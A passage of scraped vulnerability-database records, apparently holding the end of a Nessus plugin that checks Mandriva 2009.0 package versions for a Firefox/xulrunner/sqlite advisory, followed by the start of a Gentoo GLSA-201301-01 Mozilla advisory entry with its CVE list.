value:\"p-cpe:/a:mandriva:linux:beagle-epiphany\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:beagle-evolution\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:beagle-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:beagle-gui-qt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:beagle-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:devhelp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:devhelp-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:epiphany\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:epiphany-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-af\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-be\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-bg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-bn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-cy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-da\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-en_GB\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-eo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-es_AR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-es_ES\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-et\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-eu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ext-beagle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ext-blogrovr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ext-mozvoikko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ext-scribefire\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ext-xmarks\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-fy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ga_IE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-gl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-gu_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-he\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-hi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-hu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-is\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-kn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-lt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-lv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-mk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-mr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-nb_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-nn_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-pa_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-pt_BR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-pt_PT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-si\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-sk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-sq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-sv_SE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-te\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-th\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-theme-kfirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-uk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gnome-python-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gnome-python-gda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gnome-python-gda-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gnome-python-gdl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gnome-python-gtkhtml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gnome-python-gtkmozembed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gnome-python-gtkspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64devhelp-1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64devhelp-1_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64sqlite3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64sqlite3-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64sqlite3_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64xulrunner1.9.2.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libdevhelp-1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libdevhelp-1_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsqlite3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsqlite3-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsqlite3_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxulrunner1.9.2.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-beagle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:sqlite3-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tcl-sqlite3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:yelp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/04/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.0\", reference:\"beagle-0.3.8-13.19mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"beagle-crawl-system-0.3.8-13.19mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"beagle-doc-0.3.8-13.19mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"beagle-epiphany-0.3.8-13.19mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"beagle-evolution-0.3.8-13.19mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"beagle-gui-0.3.8-13.19mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"beagle-gui-qt-0.3.8-13.19mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"beagle-libs-0.3.8-13.19mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"devhelp-0.21-3.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"devhelp-plugins-0.21-3.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"epiphany-2.24.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"epiphany-devel-2.24.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-3.6.3-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-af-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-ar-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-be-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-bg-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-bn-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-ca-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-cs-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-cy-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-da-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-de-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-devel-3.6.3-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-el-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-en_GB-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-eo-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-es_AR-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-es_ES-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-et-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-eu-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-ext-beagle-0.3.8-13.19mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-ext-blogrovr-1.1.804-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-ext-mozvoikko-1.0-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-ext-scribefire-3.5.1-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-ext-xmarks-3.5.10-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-fi-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-fr-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-fy-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-ga_IE-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-gl-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-gu_IN-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-he-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-hi-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-hu-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-id-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-is-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-it-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-ja-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-kn-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-ko-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-lt-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-lv-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-mk-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-mr-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-nb_NO-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-nl-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-nn_NO-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-pa_IN-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-pl-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-pt_BR-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-pt_PT-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-ro-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-ru-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-si-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-sk-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-sl-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-sq-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-sv_SE-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-te-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-th-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-theme-kfirefox-0.16-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-tr-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-uk-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-zh_CN-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"firefox-zh_TW-3.6.3-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"gnome-python-extras-2.19.1-20.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"gnome-python-gda-2.19.1-20.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"gnome-python-gda-devel-2.19.1-20.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"gnome-python-gdl-2.19.1-20.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"gnome-python-gtkhtml2-2.19.1-20.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"gnome-python-gtkmozembed-2.19.1-20.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"gnome-python-gtkspell-2.19.1-20.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"lemon-3.6.23.1-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64devhelp-1-devel-0.21-3.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64devhelp-1_0-0.21-3.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64sqlite3-devel-3.6.23.1-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64sqlite3-static-devel-3.6.23.1-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64sqlite3_0-3.6.23.1-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64xulrunner-devel-1.9.2.3-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64xulrunner1.9.2.3-1.9.2.3-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libdevhelp-1-devel-0.21-3.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libdevhelp-1_0-0.21-3.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libsqlite3-devel-3.6.23.1-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libsqlite3-static-devel-3.6.23.1-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libsqlite3_0-3.6.23.1-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libxulrunner-devel-1.9.2.3-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libxulrunner1.9.2.3-1.9.2.3-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mozilla-thunderbird-beagle-0.3.8-13.19mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"sqlite3-tools-3.6.23.1-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"tcl-sqlite3-3.6.23.1-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"xulrunner-1.9.2.3-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"yelp-2.24.0-3.13mdv2009.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:54:31", "description": "The remote host is affected by the vulnerability described in GLSA-201301-01\n(Mozilla Products: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Mozilla Firefox,\n Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user to view a specially crafted web\n page or email, possibly resulting in execution of arbitrary code or a\n Denial of Service condition. Furthermore, a remote attacker may be able\n to perform Man-in-the-Middle attacks, obtain sensitive information,\n bypass restrictions and protection mechanisms, force file downloads,\n conduct XML injection attacks, conduct XSS attacks, bypass the Same\n Origin Policy, spoof URL’s for phishing attacks, trigger a vertical\n scroll, spoof the location bar, spoof an SSL indicator, modify the\n browser’s font, conduct clickjacking attacks, or have other unspecified\n impact.\n A local attacker could gain escalated privileges, obtain sensitive\n information, or replace an arbitrary downloaded file.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-01-08T00:00:00", "title": "GLSA-201301-01 : Mozilla Products: Multiple vulnerabilities (BEAST)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1945", "CVE-2011-3648", "CVE-2009-0355", "CVE-2011-0061", "CVE-2011-0077", "CVE-2012-0478", "CVE-2012-4193", "CVE-2011-1202", "CVE-2012-0442", "CVE-2010-3772", "CVE-2011-0071", "CVE-2009-2470", "CVE-2010-0654", "CVE-2009-3388", "CVE-2012-1962", "CVE-2012-0443", "CVE-2011-3866", "CVE-2011-0068", "CVE-2012-5842", "CVE-2012-4212", "CVE-2009-2477", "CVE-2010-0176", "CVE-2011-3640", "CVE-2011-0083", "CVE-2010-1203", "CVE-2009-3076", "CVE-2012-1970", "CVE-2009-3389", "CVE-2008-3835", "CVE-2012-3989", "CVE-2010-2762", "CVE-2012-5830", "CVE-2012-4210", "CVE-2009-1305", "CVE-2011-3026", "CVE-2009-3979", "CVE-2011-2370", "CVE-2012-0460", "CVE-2012-1973", "CVE-2009-3376", "CVE-2011-2369", "CVE-2011-2998", "CVE-2011-3654", "CVE-2011-2605", "CVE-2009-1833", "CVE-2010-0165", "CVE-2012-1974", "CVE-2010-0220", "CVE-2010-2766", "CVE-2011-2993", "CVE-2012-4195", "CVE-2010-0168", "CVE-2012-3986", "CVE-2010-0160", "CVE-2009-1169", "CVE-2011-2371", "CVE-2009-3379", "CVE-2012-4185", "CVE-2010-3777", "CVE-2012-3991", "CVE-2012-5354", "CVE-2012-4206", "CVE-2009-3071", "CVE-2012-3968", "CVE-2010-1214", "CVE-2012-3963", "CVE-2010-0174", "CVE-2010-0172", "CVE-2009-2535", "CVE-2012-0452", "CVE-2009-1312", "CVE-2012-1956", "CVE-2012-3978", "CVE-2012-3985", "CVE-2011-2995", "CVE-2012-5829", "CVE-2009-1571", "CVE-2008-5505", "CVE-2012-5838", "CVE-2011-2986", "CVE-2010-1205", "CVE-2009-2210", "CVE-2009-2478", "CVE-2008-6961", "CVE-2012-0479", "CVE-2012-0450", "CVE-2012-1940", "CVE-2012-3993", "CVE-2008-5500", "CVE-2012-5836", "CVE-2009-3274", "CVE-2010-1125", 